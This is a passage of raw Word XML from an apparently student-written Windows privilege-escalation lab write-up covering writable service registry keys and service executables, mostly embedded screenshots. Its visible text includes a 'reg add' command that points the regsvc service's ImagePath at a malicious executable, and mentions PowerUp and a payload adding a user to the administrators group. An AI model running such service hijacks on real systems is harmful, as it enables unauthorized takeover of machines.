          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="697445B9" wp14:editId="1B419C63">
            <wp:extent cx="6316980" cy="14401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6980" cy="1440180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D55A8EF" w14:textId="53747614" w:rsidR="008500A9" w:rsidRDefault="00A1567E" w:rsidP="004200D6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20BEC44B" wp14:editId="03D66885">
            <wp:extent cx="5943600" cy="958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958215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E2CD36" w14:textId="69DB90DF" w:rsidR="00A1567E" w:rsidRDefault="00A1567E" w:rsidP="004200D6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="766203D8" wp14:editId="2CA5A5EF">
            <wp:extent cx="5943600" cy="14401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440180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2751AD0E" w14:textId="45554966" w:rsidR="00A1567E" w:rsidRDefault="0003401D" w:rsidP="004200D6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ECF958B" wp14:editId="0682070E">
            <wp:extent cx="5943600" cy="1577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77340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EDB96D" w14:textId="3784CE0F" w:rsidR="0003401D" w:rsidRDefault="0003401D" w:rsidP="004200D6">
      <w:r>
        <w:t xml:space="preserve">Only this path can do anything with “user”. after I create payload to add the user to administrator group </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B113D2" w14:textId="7CE1DE5A" w:rsidR="0003401D" w:rsidRDefault="0003401D" w:rsidP="004200D6"/>
    <w:p w14:paraId="001C18C9" w14:textId="50EF94AF" w:rsidR="0003401D" w:rsidRDefault="0003401D" w:rsidP="004200D6"/>
    <w:p w14:paraId="1227EA3A" w14:textId="2BEE79F1" w:rsidR="0003401D" w:rsidRDefault="0003401D" w:rsidP="004200D6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="551B8ADA" wp14:editId="50BE346F">
            <wp:extent cx="6332220" cy="1584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2220" cy="1584960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C8D070" w14:textId="167CF22E" w:rsidR="0003401D" w:rsidRDefault="0003401D" w:rsidP="004200D6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="526395D1" wp14:editId="32DB1A41">
            <wp:extent cx="5943600" cy="18973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97380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4152DB14" w14:textId="2A6CAEC2" w:rsidR="0003401D" w:rsidRDefault="0003401D" w:rsidP="004200D6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35C328AF" wp14:editId="33466C1E">
            <wp:extent cx="5943600" cy="39230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923030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="267908D8" w14:textId="0C54FB12" w:rsidR="00A00F5F" w:rsidRDefault="00A00F5F" w:rsidP="004200D6"/>
    <w:p w14:paraId="143312DF" w14:textId="2F7AA0F0" w:rsidR="004D2A5D" w:rsidRDefault="001F6E4E" w:rsidP="004D2A5D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001F6E4E">
        <w:lastRenderedPageBreak/>
        <w:t>Exercise 5 – Services (Registry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7CDA40" w14:textId="77777777" w:rsidR="00AC20F6" w:rsidRPr="00AC20F6" w:rsidRDefault="00AC20F6" w:rsidP="00AC20F6"/>
    <w:p w14:paraId="0DECEC67" w14:textId="11533A6E" w:rsidR="004D2A5D" w:rsidRDefault="004D2A5D" w:rsidP="004D2A5D">
      <w:r w:rsidRPr="004D2A5D">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00BF33AF">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004D2A5D">
        <w:t xml:space="preserve">HKLM\SYSTEM\CurrentControlSet\Control </w:t>
      </w:r>
      <w:r w:rsidR="00BF33AF">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004D2A5D">
        <w:t>registry tree contains information for controlling system startup and some aspects of device configuration</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FootnoteReference"/>
        </w:rPr>
        <w:footnoteReference w:id="1"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="445494F3" w14:textId="26711076" w:rsidR="004D2A5D" w:rsidRPr="004D2A5D" w:rsidRDefault="004D2A5D" w:rsidP="004D2A5D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CCE71EE" wp14:editId="5412D8E4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-579120</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7231380" cy="394716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231380" cy="3947160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AFF70A" w14:textId="202EE209" w:rsidR="004D2A5D" w:rsidRPr="004D2A5D" w:rsidRDefault="004D2A5D" w:rsidP="004D2A5D"/>
    <w:p w14:paraId="7FDBEFAF" w14:textId="5DCC92F9" w:rsidR="00B97284" w:rsidRPr="001F6E4E" w:rsidRDefault="00B97284" w:rsidP="001F6E4E"/>
    <w:p w14:paraId="2707827E" w14:textId="26FAD777" w:rsidR="0003401D" w:rsidRDefault="0003401D" w:rsidP="004200D6"/>
    <w:p w14:paraId="0028BB50" w14:textId="35A69FB0" w:rsidR="004D2A5D" w:rsidRDefault="004D2A5D" w:rsidP="004200D6"/>
    <w:p w14:paraId="5449028C" w14:textId="0FF39465" w:rsidR="004D2A5D" w:rsidRDefault="004D2A5D" w:rsidP="004200D6"/>
    <w:p w14:paraId="0E90B0E0" w14:textId="5FDE2E1B" w:rsidR="004D2A5D" w:rsidRDefault="004D2A5D" w:rsidP="004200D6"/>
    <w:p w14:paraId="699BAC81" w14:textId="1435C3E2" w:rsidR="004D2A5D" w:rsidRDefault="004D2A5D" w:rsidP="004200D6"/>
    <w:p w14:paraId="6DA8619B" w14:textId="6FB57376" w:rsidR="004D2A5D" w:rsidRDefault="004D2A5D" w:rsidP="004200D6"/>
    <w:p w14:paraId="1F1B7553" w14:textId="7B70A393" w:rsidR="004D2A5D" w:rsidRDefault="004D2A5D" w:rsidP="004200D6"/>
    <w:p w14:paraId="2B4047F9" w14:textId="5C15E1D0" w:rsidR="004D2A5D" w:rsidRDefault="004D2A5D" w:rsidP="004200D6"/>
    <w:p w14:paraId="4E84D7E8" w14:textId="595BB5F9" w:rsidR="004D2A5D" w:rsidRDefault="004D2A5D" w:rsidP="004200D6"/>
    <w:p w14:paraId="777B379B" w14:textId="77777777" w:rsidR="00AC20F6" w:rsidRDefault="00AC20F6" w:rsidP="004200D6"/>
    <w:p w14:paraId="37D225A7" w14:textId="77777777" w:rsidR="00AC20F6" w:rsidRDefault="00AC20F6" w:rsidP="004200D6"/>
    <w:p w14:paraId="2AC361CA" w14:textId="77777777" w:rsidR="00AC20F6" w:rsidRDefault="00AC20F6" w:rsidP="004200D6"/>
    <w:p w14:paraId="448420A2" w14:textId="13FB4CF0" w:rsidR="004D2A5D" w:rsidRDefault="00BB0029" w:rsidP="004200D6">
      <w:r>
        <w:t>So,</w:t>
      </w:r>
      <w:r w:rsidR="004D2A5D">
        <w:t xml:space="preserve"> in that case user have </w:t>
      </w:r>
      <w:r>
        <w:t>privilege</w:t>
      </w:r>
      <w:r w:rsidR="004D2A5D">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">change the HKLM registry. </w:t>
      </w:r>
      <w:r w:rsidR="00C84E7B">
        <w:t>So,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we can create malicious executable file and add to the registry and after adding it auto magically get the privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB6E7DC" w14:textId="1F1C8ED5" w:rsidR="00B9748A" w:rsidRDefault="00DB31A5" w:rsidP="004200D6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74D14A8C" wp14:editId="216A96E4">
            <wp:extent cx="5943600" cy="3573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73780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CFE958" w14:textId="25A0451E" w:rsidR="00B9748A" w:rsidRDefault="00B9748A" w:rsidP="004200D6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28519778" wp14:editId="6ECA6B25">
            <wp:extent cx="5943600" cy="1283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83970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C98ABE5" w14:textId="0E72DC68" w:rsidR="00BB0029" w:rsidRDefault="00B9748A" w:rsidP="004200D6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3CCEDA02" wp14:editId="530C6F74">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-464820</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1793240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6819900" cy="6934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819900" cy="693420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03482955" wp14:editId="3C5B11A4">
            <wp:extent cx="5943600" cy="1670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70685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78093355" w14:textId="544484AC" w:rsidR="00B9748A" w:rsidRDefault="00B9748A" w:rsidP="004200D6"/>
    <w:p w14:paraId="63A29D03" w14:textId="706E76D2" w:rsidR="00766CD1" w:rsidRDefault="00766CD1" w:rsidP="004200D6"/>
    <w:p w14:paraId="58D1445C" w14:textId="6F3850D1" w:rsidR="00766CD1" w:rsidRDefault="00766CD1" w:rsidP="004200D6"/>
    <w:p w14:paraId="31D54A6D" w14:textId="06C7C67F" w:rsidR="00766CD1" w:rsidRDefault="00766CD1" w:rsidP="00766CD1">
      <w:r>
        <w:t>reg add HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\services\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>regsvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ImagePath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /t REG_EXPAND_SZ /d C:\Temp\cyber.exe /f  </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00766CD1">
        <w:t>we changed the PATH of the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00766CD1">
        <w:t>regsvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00766CD1">
        <w:t xml:space="preserve">” service by the </w:t>
      </w:r>
      <w:r>
        <w:t>below</w:t>
      </w:r>
      <w:r w:rsidRPr="00766CD1">
        <w:t xml:space="preserve"> image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3916A7AB" w14:textId="2BD67D4A" w:rsidR="00490290" w:rsidRDefault="00490290" w:rsidP="00766CD1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Before </w:t>
      </w:r>
      <w:r w:rsidR="00AC20F6">
        <w:t>running</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the service command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E950CF0" w14:textId="1F2B8354" w:rsidR="00766CD1" w:rsidRDefault="00490290" w:rsidP="00766CD1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="156BB956" wp14:editId="6BF488A8">
            <wp:extent cx="5857875" cy="310896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7875" cy="3108960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6359EF60" w14:textId="72582B5B" w:rsidR="00490290" w:rsidRDefault="00490290" w:rsidP="00766CD1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B842471" wp14:editId="33F8EE85">
            <wp:extent cx="5943600" cy="3881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881755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E814222" w14:textId="4068FDEF" w:rsidR="00766CD1" w:rsidRDefault="00490290" w:rsidP="004200D6">
      <w:r>
        <w:t>“sc.exe is a command-line tool which comes bundled with Windows and offers the functionality to maintain and administer Windows NT services.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E2A114" w14:textId="0F4A3B49" w:rsidR="00344F8E" w:rsidRDefault="00344F8E" w:rsidP="004200D6"/>
    <w:p w14:paraId="2DD109C8" w14:textId="42CE2DA5" w:rsidR="00344F8E" w:rsidRDefault="00823394" w:rsidP="00823394">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00823394">
        <w:lastRenderedPageBreak/>
        <w:t>Exercise 6 – Services (Executable File)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2485000C" w14:textId="5E910245" w:rsidR="00823394" w:rsidRDefault="00823394" w:rsidP="00823394">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B2C5EEC" wp14:editId="7EED9EEC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-381000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>285115</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6675120" cy="13487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75120" cy="1348740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">After running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we can find some vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FF2525" w14:textId="05E2883B" w:rsidR="00823394" w:rsidRDefault="00823394" w:rsidP="00823394"/>
    <w:p w14:paraId="7AB9D82C" w14:textId="091E0CC1" w:rsidR="00823394" w:rsidRPr="00823394" w:rsidRDefault="00823394" w:rsidP="00823394"/>
    <w:p w14:paraId="1639CF30" w14:textId="7CF6AE94" w:rsidR="00823394" w:rsidRDefault="00823394" w:rsidP="00823394"/>
    <w:p w14:paraId="1E9464DF" w14:textId="59891CDF" w:rsidR="00823394" w:rsidRDefault="00823394" w:rsidP="00823394"/>
    <w:p w14:paraId="7C257BC9" w14:textId="4E4C66A7" w:rsidR="00823394" w:rsidRDefault="003C6918" w:rsidP="00823394">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61970BC6" wp14:editId="1EC48914">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-365760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>281940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6621780" cy="1729740"/>
            <wp:effectExtent l="0" t="0" r="762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21780" cy="1729740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C597E13" w14:textId="2CA4AE7D" w:rsidR="00823394" w:rsidRDefault="00823394" w:rsidP="00823394"/>
    <w:p w14:paraId="44C6C422" w14:textId="54B711E4" w:rsidR="003C6918" w:rsidRDefault="003C6918" w:rsidP="00823394"/>
    <w:p w14:paraId="0E364B25" w14:textId="53ED92D2" w:rsidR="003C6918" w:rsidRDefault="003C6918" w:rsidP="00823394"/>
    <w:p w14:paraId="5C266DF6" w14:textId="495550E1" w:rsidR="003C6918" w:rsidRDefault="003C6918" w:rsidP="00823394"/>
    <w:p w14:paraId="690CB1C2" w14:textId="270C6081" w:rsidR="003C6918" w:rsidRDefault="003C6918" w:rsidP="00823394"/>
    <w:p w14:paraId="20DF0676" w14:textId="1949971C" w:rsidR="003C6918" w:rsidRDefault="003C6918" w:rsidP="00823394"/>
    <w:p w14:paraId="0D661036" w14:textId="3736D9C0" w:rsidR="003C6918" w:rsidRDefault="003C6918" w:rsidP="00823394">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49BCD034" wp14:editId="16BCAEE5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-358140</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>149860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6621780" cy="1242060"/>
            <wp:effectExtent l="0" t="0" r="762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621780" cy="1242060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59422A45" w14:textId="126FA2C6" w:rsidR="003C6918" w:rsidRDefault="003C6918" w:rsidP="00823394"/>
    <w:p w14:paraId="5FC434D5" w14:textId="052BC459" w:rsidR="003C6918" w:rsidRDefault="003C6918" w:rsidP="00823394"/>
    <w:p w14:paraId="7B182C32" w14:textId="69647E43" w:rsidR="003C6918" w:rsidRDefault="003C6918" w:rsidP="00823394"/>
    <w:p w14:paraId="4F4CB32B" w14:textId="71F8A09D" w:rsidR="003C6918" w:rsidRDefault="003C6918" w:rsidP="00823394"/>
    <w:p w14:paraId="73F02B04" w14:textId="3D1824C1" w:rsidR="00D73A4D" w:rsidRDefault="00D73A4D" w:rsidP="00823394">
      <w:r>
        <w:t>After write some script to run get the privilege from the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FDC3DF" w14:textId="71B6F93A" w:rsidR="003C6918" w:rsidRDefault="00D73A4D" w:rsidP="00823394">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="443D2BD6" wp14:editId="48940600">
            <wp:extent cx="5943600" cy="2804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04160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13840E00" w14:textId="787074A5" w:rsidR="00D73A4D" w:rsidRDefault="00D73A4D" w:rsidP="00823394">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EB9DE49" wp14:editId="4100A478">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-723900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2674620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7376160" cy="30175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376160" cy="3017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0EB09F" wp14:editId="0F3D3BD3">
            <wp:extent cx="5943600" cy="25615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61590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C2EC19" w14:textId="294F7D68" w:rsidR="00D73A4D" w:rsidRDefault="00D73A4D" w:rsidP="00823394"/>
    <w:p w14:paraId="698AD758" w14:textId="0288D43D" w:rsidR="00D73A4D" w:rsidRDefault="00D73A4D" w:rsidP="00823394"/>
    <w:p w14:paraId="5642D2CB" w14:textId="5C9D9D26" w:rsidR="00D73A4D" w:rsidRDefault="00D73A4D" w:rsidP="00823394"/>
    <w:p w14:paraId="25A29EC3" w14:textId="6AB15E27" w:rsidR="00D73A4D" w:rsidRDefault="00D73A4D" w:rsidP="00823394"/>
    <w:p w14:paraId="3175EAAA" w14:textId="13B85633" w:rsidR="00D73A4D" w:rsidRDefault="00D73A4D" w:rsidP="00823394"/>
    <w:p w14:paraId="21CF9F39" w14:textId="351C0621" w:rsidR="00D73A4D" w:rsidRDefault="00D73A4D" w:rsidP="00823394"/>
    <w:p w14:paraId="0F23F137" w14:textId="70E97A8F" w:rsidR="00D73A4D" w:rsidRDefault="00D73A4D" w:rsidP="00823394"/>
    <w:p w14:paraId="480FA6E7" w14:textId="1B82B593" w:rsidR="00D73A4D" w:rsidRDefault="00D73A4D" w:rsidP="00823394"/>
    <w:p w14:paraId="007C9116" w14:textId="45D6B3D0" w:rsidR="00D73A4D" w:rsidRDefault="00D73A4D" w:rsidP="00823394"/>
    <w:p w14:paraId="58BCFC97" w14:textId="653323D7" w:rsidR="00D73A4D" w:rsidRDefault="00D73A4D" w:rsidP="00823394"/>
    <w:p w14:paraId="75F2DA06" w14:textId="50B26E87" w:rsidR="00D73A4D" w:rsidRDefault="00D73A4D" w:rsidP="00823394"/>
    <w:p w14:paraId="68471033" w14:textId="38173127" w:rsidR="00D929E4" w:rsidRDefault="00E27D5E" w:rsidP="00823394">
      <w:r>
        <w:t>Again,</w:t>
      </w:r>
      <w:r w:rsidR="00D929E4">
        <w:t xml:space="preserve"> start the service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D134C1B" w14:textId="069144F8" w:rsidR="00D73A4D" w:rsidRDefault="00D73A4D" w:rsidP="00823394">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A83F85F" wp14:editId="73733D97">
            <wp:extent cx="5943600" cy="13138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313815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D60FC1E" w14:textId="1E0084AE" w:rsidR="00D2324A" w:rsidRDefault="00D2324A" w:rsidP="00823394">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14EEBEF6" wp14:editId="26834884">
            <wp:extent cx="5943600" cy="36163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616325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
